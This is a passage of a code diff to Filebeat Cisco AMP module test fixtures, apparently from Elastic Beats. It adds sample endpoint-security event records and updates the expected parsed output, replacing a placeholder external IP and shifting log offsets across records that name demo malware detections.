Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
index 32a9295d083f..6902f74ba521 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
@@ -3,7 +3,7 @@
         "@timestamp": "2021-01-14T10:33:46.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -54,7 +54,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -66,7 +66,7 @@
         "@timestamp": "2021-01-14T10:15:29.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -92,13 +92,13 @@
         "host.hostname": "Demo_AMP_Threat_Quarantined",
         "host.name": "Demo_AMP_Threat_Quarantined",
         "input.type": "log",
-        "log.offset": 1358,
+        "log.offset": 1363,
         "related.hosts": [
             "Demo_AMP_Threat_Quarantined"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -110,7 +110,7 @@
         "@timestamp": "2021-01-14T10:06:39.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -151,7 +151,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 2295,
+        "log.offset": 2305,
         "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866",
         "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878",
         "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2",
@@ -167,7 +167,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -183,7 +183,7 @@
         "@timestamp": "2021-01-14T10:06:39.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -215,7 +215,7 @@
         "host.hostname": "Demo_AMP_Threat_Quarantined",
         "host.name": "Demo_AMP_Threat_Quarantined",
         "input.type": "log",
-        "log.offset": 3885,
+        "log.offset": 3900,
         "related.hash": [
             "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
         ],
@@ -224,7 +224,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -236,7 +236,7 @@
         "@timestamp": "2021-01-14T10:05:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -270,7 +270,7 @@
         "host.hostname": "Demo_AMP_Threat_Quarantined",
         "host.name": "Demo_AMP_Threat_Quarantined",
         "input.type": "log",
-        "log.offset": 5008,
+        "log.offset": 5028,
         "related.hash": [
             "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
         ],
@@ -279,7 +279,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -291,7 +291,7 @@
         "@timestamp": "2021-01-14T10:05:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -332,7 +332,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 6204,
+        "log.offset": 6229,
         "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866",
         "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878",
         "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2",
@@ -348,7 +348,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -364,7 +364,7 @@
         "@timestamp": "2021-01-14T10:05:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -403,7 +403,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 7800,
+        "log.offset": 7830,
         "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866",
         "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878",
         "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2",
@@ -417,7 +417,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -433,7 +433,7 @@
         "@timestamp": "2021-01-14T10:05:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -465,7 +465,7 @@
         "host.hostname": "Demo_AMP_Threat_Quarantined",
         "host.name": "Demo_AMP_Threat_Quarantined",
         "input.type": "log",
-        "log.offset": 9301,
+        "log.offset": 9336,
         "related.hash": [
             "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
         ],
@@ -474,7 +474,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -488,7 +488,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.WScriptExecuteFakeExtension.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -523,7 +523,7 @@
         "host.hostname": "Demo_AMP_Threat_Quarantined",
         "host.name": "Demo_AMP_Threat_Quarantined",
         "input.type": "log",
-        "log.offset": 10424,
+        "log.offset": 10464,
         "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894",
         "related.hash": [
             "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"
@@ -533,7 +533,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -547,7 +547,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.Bitsadmin.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -582,7 +582,7 @@
         "host.hostname": "Demo_AMP_Threat_Quarantined",
         "host.name": "Demo_AMP_Threat_Quarantined",
         "input.type": "log",
-        "log.offset": 12096,
+        "log.offset": 12141,
         "process.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0",
         "related.hash": [
             "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"
@@ -592,7 +592,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -606,7 +606,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.WScriptLaunchedZippedJS.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -641,7 +641,7 @@
         "host.hostname": "Demo_AMP_Threat_Quarantined",
         "host.name": "Demo_AMP_Threat_Quarantined",
         "input.type": "log",
-        "log.offset": 14294,
+        "log.offset": 14344,
         "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894",
         "related.hash": [
             "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"
@@ -651,7 +651,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -665,7 +665,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -700,7 +700,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 16006,
+        "log.offset": 16061,
         "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae",
         "related.hash": [
             "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"
@@ -710,7 +710,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -724,7 +724,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.BCDEditDisableRecovery.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -759,7 +759,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 17775,
+        "log.offset": 17835,
         "process.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
         "related.hash": [
             "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
@@ -769,7 +769,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -783,7 +783,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.FakeExtensionExec.RET",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -819,7 +819,7 @@
         "host.hostname": "Demo_Low_Prev_Retro",
         "host.name": "Demo_Low_Prev_Retro",
         "input.type": "log",
-        "log.offset": 19558,
+        "log.offset": 19623,
         "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8",
         "related.hash": [
             "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
@@ -829,7 +829,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -841,7 +841,7 @@
         "@timestamp": "2021-01-14T10:01:51.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -872,7 +872,7 @@
         "host.hostname": "Demo_BP_WMIPRVSE",
         "host.name": "Demo_BP_WMIPRVSE",
         "input.type": "log",
-        "log.offset": 21167,
+        "log.offset": 21237,
         "related.hash": [
             "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"
         ],
@@ -881,7 +881,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -893,7 +893,7 @@
         "@timestamp": "2021-01-14T10:01:50.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -931,7 +931,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 27082,
+        "log.offset": 27177,
         "process.hash.md5": "23ee3d381cfe3b9f6229483e2ce2f9e1",
         "process.hash.sha1": "93cf877f5627e55ec076a656e935042fac39950e",
         "process.hash.sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57",
@@ -945,7 +945,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -963,7 +963,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PsexecAsAdmin.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -998,7 +998,7 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 28604,
+        "log.offset": 28704,
         "process.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386",
         "related.hash": [
             "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"
@@ -1008,7 +1008,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1020,7 +1020,7 @@
         "@timestamp": "2021-01-14T07:56:40.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1058,7 +1058,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 30050,
+        "log.offset": 30155,
         "related.hash": [
             "41476df3138717868118d8542cf3d1d6",
             "5ca4bef8de6def53519d4b22632675bb4c1e470b",
@@ -1069,7 +1069,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1083,7 +1083,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1118,7 +1118,7 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 31276,
+        "log.offset": 31386,
         "process.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8",
         "related.hash": [
             "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"
@@ -1128,7 +1128,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1140,7 +1140,7 @@
         "@timestamp": "2021-01-14T00:37:44.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1173,7 +1173,7 @@
         "host.hostname": "Demo_AMP",
         "host.name": "Demo_AMP",
         "input.type": "log",
-        "log.offset": 33023,
+        "log.offset": 33138,
         "related.hash": [
             "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"
         ],
@@ -1182,7 +1182,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1194,7 +1194,7 @@
         "@timestamp": "2021-01-14T00:27:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1232,7 +1232,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 34132,
+        "log.offset": 34252,
         "related.hash": [
             "41476df3138717868118d8542cf3d1d6",
             "5ca4bef8de6def53519d4b22632675bb4c1e470b",
@@ -1243,7 +1243,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1255,7 +1255,7 @@
         "@timestamp": "2021-01-14T00:02:08.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1281,13 +1281,13 @@
         "host.hostname": "Demo_AMP_MAP_FriedEx",
         "host.name": "Demo_AMP_MAP_FriedEx",
         "input.type": "log",
-        "log.offset": 35358,
+        "log.offset": 35483,
         "related.hosts": [
             "Demo_AMP_MAP_FriedEx"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1299,7 +1299,7 @@
         "@timestamp": "2021-01-13T15:36:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1333,7 +1333,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 36288,
+        "log.offset": 36418,
         "related.hash": [
             "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
         ],
@@ -1342,7 +1342,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1354,7 +1354,7 @@
         "@timestamp": "2021-01-13T15:36:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1386,7 +1386,7 @@
         "host.hostname": "Demo_Qakbot_1",
         "host.name": "Demo_Qakbot_1",
         "input.type": "log",
-        "log.offset": 37489,
+        "log.offset": 37624,
         "related.hash": [
             "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
         ],
@@ -1395,7 +1395,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1407,7 +1407,7 @@
         "@timestamp": "2021-01-13T15:36:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1445,7 +1445,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 38602,
+        "log.offset": 38742,
         "related.hash": [
             "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
         ],
@@ -1454,7 +1454,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1466,7 +1466,7 @@
         "@timestamp": "2021-01-13T15:36:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1506,7 +1506,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 39856,
+        "log.offset": 40001,
         "related.hash": [
             "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960",
             "5faebef3bb880489195e80e6656ccf442ff7123b",
@@ -1517,7 +1517,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1529,7 +1529,7 @@
         "@timestamp": "2021-01-13T10:37:33.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1659,7 +1659,7 @@
         "host.hostname": "Demo_AMP",
         "host.name": "Demo_AMP",
         "input.type": "log",
-        "log.offset": 41214,
+        "log.offset": 41364,
         "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef",
         "related.hash": [
             "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"
@@ -1669,7 +1669,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1681,7 +1681,7 @@
         "@timestamp": "2021-01-13T10:23:35.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1707,13 +1707,13 @@
         "host.hostname": "Demo_AMP",
         "host.name": "Demo_AMP",
         "input.type": "log",
-        "log.offset": 44193,
+        "log.offset": 44348,
         "related.hosts": [
             "Demo_AMP"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1727,7 +1727,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1762,7 +1762,7 @@
         "host.hostname": "Demo_AMP",
         "host.name": "Demo_AMP",
         "input.type": "log",
-        "log.offset": 45111,
+        "log.offset": 45271,
